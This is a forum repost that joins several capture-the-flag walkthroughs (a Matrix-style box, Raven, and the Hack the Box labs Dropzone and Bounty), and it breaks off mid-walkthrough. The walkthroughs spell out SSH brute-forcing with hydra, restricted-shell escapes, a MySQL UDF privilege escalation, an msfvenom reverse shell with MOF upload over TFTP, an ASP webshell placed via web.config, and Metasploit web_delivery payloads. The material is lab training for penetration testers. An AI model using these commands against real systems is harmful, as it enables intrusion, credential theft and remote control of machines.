05-14-2020, 09:58 AM
| 0 | 0 | ||
[To see content please register here]
.Security Level: Intermediate
Flags: There is one flag (flag.txt).
Table of Contents:
- Port scanning and IP discovery.
- Hitting on port 80
- Hitting on port 31337 and finding base64 encoded string
- Decode base64 encoded string
- Finding and downloading Bin file
- Decoding brainfuck encoded string
- Creating a dictionary using crunch
- SSH login brute force using hydra
- Finding rbash
- Escaping a restricted shell environment
- Exporting environment variables
- Getting root access.
- Reading the flags.
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vuCiPeYyp0U/W-cZQrnF6QI/AAAAAAAAbAw/QY6asCpCLHwSwLxdAhxjtJCYlhZig8FHgCLcBGAs/s1600/1.png?w=687&ssl=1)
We found our target –> 192.168.1.18
Our next step is to scan our target with nmap.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-2hssyidNkKU/W-cZSu7o5VI/AAAAAAAAbBI/nvfz3OpjibEA8nLvjuOELtp99D-pImGqACLcBGAs/s1600/2.png?w=687&ssl=1)
The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 31337(HTTP)
We find that port 80 is running http, so we open the IP in our browser.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-CqvSN6j9D2w/W-cZS0PfCVI/AAAAAAAAbBM/VzqX-joO6EEUa0-iMldAPmsdEbvSy4ZUQCLcBGAs/s1600/3.png?w=687&ssl=1)
We don’t find anything on the web service running on port 80. So we start enumerating the web service running on port 31337.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-H5VjJmez4r4/W-cZTfGroCI/AAAAAAAAbBQ/XnXGy0nVSSAVP7msYwVXwV7ANjaOLtoPwCLcBGAs/s1600/4.png?w=687&ssl=1)
We take a look at the source code of the web service running on port 31337 and find a base64 encoded string.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-8CLRoFvj7T0/W-cZTqUm2fI/AAAAAAAAbBU/Y-0T_3sFsrAXSkwRS6hd_Fp2ZCFS6tregCLcBGAs/s1600/5.png?w=687&ssl=1)
We decode the base64 encoded string and find a hint to that is related “Cypher.matrix”.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-RNUusa1NJ0o/W-cZTkSdzMI/AAAAAAAAbBY/x90lSy2f6lcAGhRhOGj4PZEtNw0bqBLIACLcBGAs/s1600/6.png?w=687&ssl=1)
We open “Cypher.matrix” on the web service running on port 31337 and find that it starts downloading a BIN file.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-HA33Qo_gDW0/W-cZUfN6hHI/AAAAAAAAbBg/ROIwZbQWrcIgh1dohqUaZCb3_nkIbqyjgCLcBGAs/s1600/7.png?w=687&ssl=1)
We take a look at the content of the file and find “brainfuck” encoded string.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-YlUaQqbI8rA/W-cZUKMWuuI/AAAAAAAAbBc/1otuTlg4XR4StIxCZjyEcNRQI_Zdw1zhgCLcBGAs/s1600/8.png?w=687&ssl=1)
We decode the brainfuck encoded a string using this site
[To see content please register here]
and find an incomplete password for the user “guest”.![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Q9Vv-jzFj4Q/W-cZUycUUlI/AAAAAAAAbBk/qXhKvzXQRBoGwuwi_XGybnzEGccXp4D6QCLcBGAs/s1600/9.png?w=687&ssl=1)
As the last 2 characters are missing we create a wordlist using crunch so that we can brute force SSH login.
crunch 8 8 -t k1ll0r%@ -o dict.txt
1
crunch 8 8 -t k1ll0r%@ -o dict.txt
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-UW3IxQlvKqw/W-cZQq2xXXI/AAAAAAAAbA0/1FwX_KfD1-MU9LmQ1XZa_506Gehqh-CaQCLcBGAs/s1600/10.png?w=687&ssl=1)
We use hydra to brute force ssh login using the dictionary we created earlier and find the password to be “k1ll0r7n”.
hydra -l guest -P dict.txt 192.168.1.18 ssh
1
hydra -l guest -P dict.txt 192.168.1.18 ssh
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-rWbjc2NPtuI/W-cZQ2dVJuI/AAAAAAAAbA4/NqCkQ3J6ZFgJ2JiCyYAixYx26bBjPQfFQCLcBGAs/s1600/11.png?w=687&ssl=1)
Now that we know the password we login through SSH using credentials “guest:k1ll0r7n”
ssh [email protected]
1
ssh [email protected]
After logging in we try to run the “ls” command but are unable to run it as we have a rbash shell.
ls
1
ls
We check the PATH environment variable and find the path to be “/home/guest/prog”.
$PATH
1
$PATH
Now as we cannot run “ls” command we try to find commands that can run. After trying a few commands we find that we can run “echo” command. We use the “echo” command to find the executables inside “/home/guest/prog” and find “vi” is available.
echo /home/guest/prog/*
1
echo /home/guest/prog/*
Now we check the SHELL environment variable and find we have an only rbash shell.
echo $SHELL
1
echo $SHELL
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-jJAOx4yktDI/W-cZRs8WYpI/AAAAAAAAbBA/oPVndgqDH6EVMm2ABNMR_O3e2h7uHqw4QCLcBGAs/s1600/13.png?w=687&ssl=1)
We run vi so that we can spawn /bin/bash and escape the restricted shell environment.
!/bin/bash
1
!/bin/bash
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-bbwfdPYqNgc/W-cZRgED6JI/AAAAAAAAbA8/_l3lfrjlZxYGHfK7vYlWuVOLiD-JeDZ6QCLcBGAs/s1600/14.png?w=687&ssl=1)
After escaping the restricted shell environment, we export /bin/bash to SHELL environment variable and “/usr/bin” directory to PATH environment variable so that we can run Linux command properly.
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
1
2
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
After exporting into the environment variables, we check the sudoers list and find we can directly get the root shell as we have all the rights.
sudo -l
sudo su
1
2
sudo -l
sudo su
We are unable to execute “su” command as we haven’t exported “/bin” directory into PATH environment. We exported “/bin” directory into a PATH environment variable and again ran the command to login as root using the password we find earlier.
export PATH=/bin:$PATH
sudo su
1
2
export PATH=/bin:$PATH
sudo su
After logging in we go to the root directory and find a file called flag.txt. We take a look at the content of the file and find the congratulatory message.
cd /root
ls
cat flag.txt
1
2
3
cd /root
ls
cat flag.txt
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-qLbNWNnpnRM/W-cZR9zSpJI/AAAAAAAAbBE/_YKzAtaeFjYv0I2qkE5ZmAViKjm-Ma5LwCLcBGAs/s1600/15.png?w=687&ssl=1)
Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven. Raven is a Beginner/Intermediate boot2root machine. There are two intended ways of getting root and we demonstrate both of the ways in this article.
Table of Contents: (Method 1)
- Port scanning and IP discovery.
- Hitting on port 80 and the discovery of WordPress CMS.
- WPScanning the website to discover two users.
- Hitting and brute forcing port 22.
- Enumerating the active processes using LinEnum script.
- Discovery of MySQL.
- Fetching the database username and password from wp-config.php.
- Using MySQL to create a UDF (user-defined function) dynamic library.
- Compiling UDF exploit to a shared library program.
- Running a UDF library program into the victim’s machine.
- Setting sticky bit on “find”.
- Getting root access.
- Reading the flags.
- Getting shell to the victim and accessing MySQL the same way till step 7 in method 1.
- In the MySQL shell, discovering all the databases and tables.
- Reading table wp_users from the database WordPress.
- Fetching hashes from the table wp_users.
- Cracking the hash to get a shell to the other user.
- Discovering python has no root required to run.
- Spawning root TTY using python one-liner.
- Reading the flags.
Discovering the active devices on a network using netdiscover and getting the IP address of our victim machine. In this case, the IP address holds 192.168.1.102
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-qwSzwuvvsDk/W-XTwbwHNBI/AAAAAAAAa_E/R7viZv-QjwoDUKXH3LMrCq_zvokR6d7JQCLcBGAs/s1600/1.png?w=687&ssl=1)
Using nmap on the victim machine we got three ports open 22,80 and 111
nmap -A 192.168.1.102
1
nmap -A 192.168.1.102
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Ckk7ptq3Oqs/W-XTzylm9dI/AAAAAAAAa_s/8_b-6gKwBT8xALHPSdjVGpWjZS7AssNGACLcBGAs/s1600/2.png?w=687&ssl=1)
So we instantly moved to port 80 and discovered a website of Raven Security.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-O9urAmIh8T8/W-XT0Fp1ZYI/AAAAAAAAa_w/NmR7q9DOr5g8Xo9WgTKoUEUGhpD0jwF2QCLcBGAs/s1600/3.png?w=687&ssl=1)
On the top right, we found a tab saying “blog” and moved to the webpage only to discover that the victim’s machine had WordPress CMS installed!
![[Image: 4.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-orzvH1IBjEA/W-XT0rWMxRI/AAAAAAAAa_0/0LVMlpxop0EGp4eDq6WmN0oq3eCDtXZxwCLcBGAs/s1600/4.1.png?w=687&ssl=1)
So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.
wpscan --url
[To see content please register here]
--wp-content-dir -ep -et -eu1
wpscan --url
[To see content please register here]
--wp-content-dir -ep -et -eu![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-y8HPN5ZS75A/W-XT0wsLORI/AAAAAAAAa_4/XLv_bg2yEZk-AdT_ydLuyIUHLapPYfr3QCLcBGAs/s1600/4.png?w=687&ssl=1)
The results returned 2 valuable users made on the victim’s machine:
Michael and Steven.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-V04DH6atFZQ/W-XT1IqKu2I/AAAAAAAAa_8/nnm6lS9XVIAUQoeZH0qFjOAys-TsR58VgCLcBGAs/s1600/5.png?w=687&ssl=1)
Now, to proceed further in the same port was seeing blurry to the eye so we tried hitting port 22 (SSH).
It is a fairly logical “hit and try” method to use the same word as both the username and password too.
We logged in to SSH with “michael” as the username and “michael” and got into the shell successfully!
Then we changed the active directory to /tmp and imported LinEnum.sh, a script to enumerate many of the basic and advanced Linux details.
It was hosted in a folder on our local machine and was imported into the victim machine using wget command.
My local IP address was 192.168.1.109 in this case.
ssh [email protected]
cd /tmp
wget
[To see content please register here]
chmod 777 LinEnum.sh1
2
3
4
ssh [email protected]
cd /tmp
wget
[To see content please register here]
chmod 777 LinEnum.sh![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-BrJnZounUtM/W-XT2MOfToI/AAAAAAAAbAA/8FZA5qOLksEOz5MyvUntzdH6gGuOwW-UQCLcBGAs/s1600/6.png?w=687&ssl=1)
After changing the permissions of the file to executable we ran the script only to find that MySQL service was running (port 3306 is evident to that).
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-nsAvY28dLBQ/W-XT2gfZf5I/AAAAAAAAbAE/GVTbK9KZ3MwdXGlHjRc4TpAWGtoE48NiQCLcBGAs/s1600/7.png?w=687&ssl=1)
We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (FOR MORE INFO:
[To see content please register here]
)![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ZrkyWH_3a3I/W-XT2w8lcqI/AAAAAAAAbAI/gGX6jCVYOzcCmyxawzypBEpirmACzmDeACLcBGAs/s1600/8.png?w=687&ssl=1)
So, we changed the current directory to /var/www/html/wordpress and searched for the wp-config file, since it will have the password to the MySQL database.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-gymfOdp0ukI/W-XT3JmHljI/AAAAAAAAbAM/I4MiQLOwhtorYOuB93oeLN0Dorqq_SljQCLcBGAs/s1600/9.png?w=687&ssl=1)
The password was found to be:
R@v3nSecurity
1
R@v3nSecurity
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-N2Xb4hvgBgI/W-XTwqx0ZpI/AAAAAAAAa_I/znKKiLMM7xgo3waGPJaQEyTHkwnpCOZtACLcBGAs/s1600/10.png?w=687&ssl=1)
So, we searched for a UDF dynamic library exploit and it was named “1518.c” in the exploit database.
[To see content please register here]
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-kCvyk39gt24/W-XTw7pxY-I/AAAAAAAAa_M/RD8rz_Sr67g_akDVOV6X2sjGbaTdx1UxwCLcBGAs/s1600/11.png?w=687&ssl=1)
The exploits run by compiling the raw C code to “.so” file and then transferring it to the victim machine and exploiting MySQL vulnerability.
The first step was to compile it.
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
1
2
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/--TTgkP72llM/W-XTxSshgRI/AAAAAAAAa_Q/BHEIrEwRoSUNeyGdFW4c432YAhhNdOziwCLcBGAs/s1600/12.png?w=687&ssl=1)
We then fired up a local server and transferred this 1518.so file to the victim’s /tmp directory since it is universally readable and writable using the wget command.
wget
[To see content please register here]
chmod 777 1518.somysql –u root –p
1
2
3
wget
[To see content please register here]
chmod 777 1518.somysql –u root –p
<entered password>
After getting a MySQL shell, we started exploiting it using the vulnerability we just found
use mysql;
1
use mysql;
Now, we created a table called “foo”
In this table, we inserted the link to 1518.so file we just imported from the local machine to /tmp directory.
We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)
In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.
Hence, we are invoking the code “chmod u+s /usr/bin/find” to set the sticky bit on “find”
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
1
2
3
4
5
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-6w3l0g95O1M/W-XTxkf0QSI/AAAAAAAAa_U/Qb4AaFEBdXESo5luVl_8rsQtmy2LNp6aACLcBGAs/s1600/13.png?w=687&ssl=1)
Now we traversed back to the directory /tmp and executed commands using the find utility.
touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;
cd /root
ls
cat flag4.txt
1
2
3
4
5
6
touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;
cd /root
ls
cat flag4.txt
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0nEnMEZ7HJM/W-XTxwgJEwI/AAAAAAAAa_Y/hTS79wU1HPY3Lt5dlLtyxxd8XWMvkz9MgCLcBGAs/s1600/14.png?w=687&ssl=1)
But since the task is also to capture all the flags we found it using the command:
find / -name "flag*.txt"
1
find / -name "flag*.txt"
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-DKHDmdlVVD4/W-XTyWv1liI/AAAAAAAAa_c/ZbSmqm9ZcF8418UnkSmwP14Cl485nnwSwCLcBGAs/s1600/15.png?w=687&ssl=1)
Second Method
Reach to the MySQL shell as above and then follow the alternate approach.
See all the databases and dump the usernames from the wp_users table in the database “WordPress”
show databases;
use wordpress;
show tables;
select * from wp_users;
1
2
3
4
show databases;
use wordpress;
show tables;
select * from wp_users;
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-77PtZGIAOQA/W-XTymVUYbI/AAAAAAAAa_g/yXlD3IugHGUsfqBW5nCqkNB-CAZm48oFwCLcBGAs/s1600/16.png?w=687&ssl=1)
We found two hashes but since we already know the password to Michael, we cracked Steven’s password using John the Ripper by pasting the hash into a text file called “hash.”
The password was found to be: pink84
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-V35CIafnh90/W-XTy1USQ8I/AAAAAAAAa_k/ie4m_ueNuMQDq0Tj8xP8bYJiV406ejt1QCLcBGAs/s1600/17.png?w=687&ssl=1)
Logging into steven’s shell and running sudo -l command we found that Python required no root permission to run.
So, we spawned a python teletype (PTY) using python’s one-liner.
su steven
sudo –l
sudo python –c 'import pty;pty.spawn("/bin/bash")'
id
1
2
3
4
su steven
sudo –l
sudo python –c 'import pty;pty.spawn("/bin/bash")'
id
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-cUTgTvAiRko/W-XTzeMnuDI/AAAAAAAAa_o/2vZXLXkyyHYMuMky8d9F1h0KXOX9jyA2wCLcBGAs/s1600/18.png?w=687&ssl=1)
So, here it is! Two ways to root Raven. Hope you found this article useful.
Today we are going to solve another CTF challenge “Dropzone”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Dropzone is 10.10.10.90
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sU -T4 10.10.10.90
1
nmap -sU -T4 10.10.10.90
From the given below image, you can observe we found port 69 is open on the target system and running TFTP service.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-TsE91fW8aRg/W98yiPVa8FI/AAAAAAAAa-M/UbnlmS6uZIkci_SbFEqPXzSTxNS6stGRwCLcBGAs/s1600/1.png?w=687&ssl=1)
We connect to the target system using a TFTP client and find that we can upload and download the file. We get the “boot.ini” file to find the operating system running system on the target machine.
tftp 10.10.10.90
1
tftp 10.10.10.90
We take a look at the boot.ini file and find that the target system is running “Windows XP”.
cat boot.ini
1
cat boot.ini
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-q2Yq-syRLg0/W98yidT9jiI/AAAAAAAAa-U/MMngEhGvloYn0ZvkKUkkpsOvOT02X1TOwCLcBGAs/s1600/2.png?w=687&ssl=1)
We are unable to find any exploit for TFTP service. So we are going to use MOF file WMI exploitation to get a reverse shell of the target machine.
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-3yXgTIDs0gA/W98yiCLaxJI/AAAAAAAAa-Q/DGiCNROyiJQRg1dPqG3lK3Z88KbKDObIgCLcBGAs/s1600/3.png?w=687&ssl=1)
We have an MSF module called “wbemexec.rb” to generate MOF file (you can find the file
[To see content please register here]
). We download the file and edit it to run our shellcode. You can download the modified code from[To see content please register here]
.![[Image: 4.1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-oRQziGTQSZY/W98yjBiR1DI/AAAAAAAAa-Y/Pg-aC6IRm-IHBfSMQJVUvYPzUWjOtheaQCLcBGAs/s1600/4.1.png?w=687&ssl=1)
We upload both the shell and the MOF file using TFTP.
tftp> binary
tftp> put hack.exe /WINDOWS/system32/hack.exe
tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof
1
2
3
tftp> binary
tftp> put hack.exe /WINDOWS/system32/hack.exe
tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-GeSnAlmupKI/W98yjGiFw3I/AAAAAAAAa-c/QLWNB_fHutcJDi40o5WhMH8j5Sn9_-qqQCLcBGAs/s1600/4.png?w=687&ssl=1)
We set up our listener before uploading both the files.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.4
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.4
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run
As soon as we upload the MOF file and our payload we get a reverse shell. After getting the reverse shell we check for system information and find that we have spawned a shell as administrator.
meterpreter > sysinfo
meterpreter > getuid
1
2
meterpreter > sysinfo
meterpreter > getuid
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-wEpqBxW26BA/W98yjZoiBDI/AAAAAAAAa-g/kEnjZzNF4TchTAefazIGYhIyax4shInwgCLcBGAs/s1600/5.png?w=687&ssl=1)
We go to “c:\Documents and Settings\Administrator\Desktop” and find a file called “root.txt”. We take a look at the content of the file and find that the flag is not present there.
meterpreter > cd Administrator
meterpreter > ls
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cat root.txt
1
2
3
4
5
meterpreter > cd Administrator
meterpreter > ls
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cat root.txt
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-I1diyUu9ooE/W98yjuD0BhI/AAAAAAAAa-k/1DXhF9Qr_cUCuSsxlUoKvJuk65lUZ-X6ACLcBGAs/s1600/6.png?w=687&ssl=1)
We go to the “flags” directory and find a file called “2 for the price of 1!.txt” and find a hint that we have to use alternate data streams to find the flags. Alternate data streams are an attribute that can be found in the NTFS file system. They can also be used to hide data from users.
meterpreter > cd flags
meterpreter > dir
meterpreter > cat "2 for the price of 1!.txt"
1
2
3
meterpreter > cd flags
meterpreter > dir
meterpreter > cat "2 for the price of 1!.txt"
We can use streams.exe from Sysinternals to examine Alternate Data Streams. (You can download the tool from
[To see content please register here]
)We upload the streams.exe into the target machine. We spawn the shell and execute the file to find data streams in the current directory and find both user and root flag.
meterpreter > upload /root/Downloads/Streams/streams.exe
meterpreter > shell
streams -accepteula -s .
1
2
3
meterpreter > upload /root/Downloads/Streams/streams.exe
meterpreter > shell
streams -accepteula -s .
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Q4vd0yMwXrg/W98ykPcS-PI/AAAAAAAAa-o/vom8scnvgwIFAQBCXObOJm8RngBXAUazACLcBGAs/s1600/7.png?w=687&ssl=1)
Today we are going to solve another CTF challenge “Bounty”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Medium
Task: To find user.txt and root.txt file
Table of Content
Scanning
- Open ports and Running services (Nmap)
- Web Directory enumeration (Dirbuster)
- Abusing HTTP through IIS/7.5
- Generate RCE by uploading web.config
- Execute PowerShell one-liner in RCE (Metasploit)
- Get user.txt flag
- Exploit kernel to get high privilege shell (Metasploit)
- Get root.txt flag
Walkthrough
Scanning
Let’s start off with our basic nmap command to find out the open ports and services.
nmap –A 10.10.10.93
1
nmap –A 10.10.10.93
Things to be observers from its result are port 80 is open for HTTP and Microsoft-IIS/7.5 is service banner.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-4VRUwm_1qX8/W9nNI40NLKI/AAAAAAAAa8I/x3dCNM6bOpMnKUAEn-jYoqX0-082sJ8XACLcBGAs/s1600/1.png?w=687&ssl=1)
Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-NIbDoq5nDUM/W9nNJILGgDI/AAAAAAAAa8Q/dBl_CTRZGlstHEZQq3s8EWmGBxiKzfSvQCLcBGAs/s1600/2.png?w=687&ssl=1)
Enumeration
Since we didn’t get any remarkable clue from the home page, therefore, we have opted Dirbuster tool for directory enumeration thus execute the following, here we had used directory-list-2.3-medium.txt directory for web directory enumeration.
![[Image: 3.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-GoqMK6NzAt8/W9nNLKgPm7I/AAAAAAAAa8w/p2q4TbvEfxkETFFTrLuS6iJ3oIFcXuo3QCLcBGAs/s1600/3.1.png?w=687&ssl=1)
Hmm!! Here I received HTTP response for /transfer.aspx file and /uploadedFiles directories.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-PBdDPqGbwag/W9nNLnKZU8I/AAAAAAAAa80/tOmh7vGJfo4b2LVmLh14UYyEdVhZmI_9gCLcBGAs/s1600/3.png?w=687&ssl=1)
When we have explored 10.10.10.93/transfer.aspx in the browser and further welcomed by following web Page given below. The following web page lets you upload a file.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-ILb4XPDpNFY/W9nNLrIO1zI/AAAAAAAAa84/6GNWMT8EEfkzQFvNJRVNEMCXuACgMjTewCLcBGAs/s1600/4.png?w=687&ssl=1)
We try to have many attempts to upload a file but every time we get a message “Invalid File. Please try again”.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-yq51ewg4PDQ/W9nNL_x5N6I/AAAAAAAAa88/KWDXlwX9JbACMEnUST9ufuHTbC0TVOoRwCLcBGAs/s1600/5.png?w=687&ssl=1)
Exploiting Vulnerability
After so many efforts, I found this
[To see content please register here]
on googling “IIS 7.5 rce upload”. Here we read about the web.config file, which plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in Apache web server. Uploading a .htaccess file to bypass protections around the uploaded files is a known technique.![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-69cNVgUDCkM/W9nNMJ7T_aI/AAAAAAAAa9A/ukXbuy4QvLs5FlT6EDBS7zyOG7qfjNU7ACLcBGAs/s1600/6.png?w=687&ssl=1)
So with the help of above-given link, we create an asp file to run web.config which will respond by adding 1 and 2.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-VkZSib7zjjg/W9nNMGStHbI/AAAAAAAAa9E/Ba8WSHQicPcMGtC3ebJiy9cCe5hwZJm7ACLcBGAs/s1600/7.png?w=687&ssl=1)
As you can observe, our web.config file is successfully uploaded inside /uploadedfiles/ directory.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-FScqSG5AfN8/W9nNMV84LJI/AAAAAAAAa9I/GbfYzvDLAIY60cYNtG4x8kHE4qgkOurYACLcBGAs/s1600/8.png?w=687&ssl=1)
So we have executed this file, it has given the expected response “3” which is the sum of 1 and 2. Hence now we can inject malicious code in this file which can create RCE vulnerability through it.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-lWE55yEZOWk/W9nNMoyUbUI/AAAAAAAAa9M/PON0hu_oufQhngY2yZRg_zTkdkwELqOnQCLcBGAs/s1600/9.png?w=687&ssl=1)
Luckily!! I found this link:
[To see content please register here]
link for ASP webshell. So I copied the whole content of asp webshell on our web.config file and upload it.![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-8vhKMpVKWv0/W9nNIwPbgeI/AAAAAAAAa8M/pviogyKRZpU1qHqlSguvFF8Ptf1WmWB0ACLcBGAs/s1600/10.png?w=687&ssl=1)
Access victim’s shell
On executing the updated web.config file, it creates a form where we can run the command as RCE. Once such surface you can run any malicious command to exploit RCE. Here we will be executing PowerShell code generated via the web delivery module of Metasploit.
msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) run
1
2
3
4
5
6
msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) run
Past the highlighted code given in the image Metasploit inside the text file and run this code to get a meterpreter session.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-uKVMR4ffW8s/W9nNJarLKaI/AAAAAAAAa8U/bqtAqImokCwMaTB911QoN6mSHl7dEz0GQCLcBGAs/s1600/20.png?w=687&ssl=1)
Great!! We have successfully got the meterpreter session of the victim’s machine, now let’s find out the user.txt file to finish this task.
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-lMJxrOSNrKU/W9nNJ60o_NI/AAAAAAAAa8Y/AnbOPietmrclmapPRRe2ObwdmEr0MpTtgCLcBGAs/s1600/21.png?w=687&ssl=1)
We successfully found the user.txt file inside /users/merlin/Desktop. Next, we need to find out the root.txt file to finish this challenge and as we know for that we need to escalated root privilege.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-nlM0AMQLU0g/W9nNKG6yEzI/AAAAAAAAa8c/pDu1-m3LDn8T2B1AJ2oWI75yt8jGbraXwCLcBGAs/s1600/22.png?w=687&ssl=1)
Privilege Escalation
Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.
use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit
1
2
3
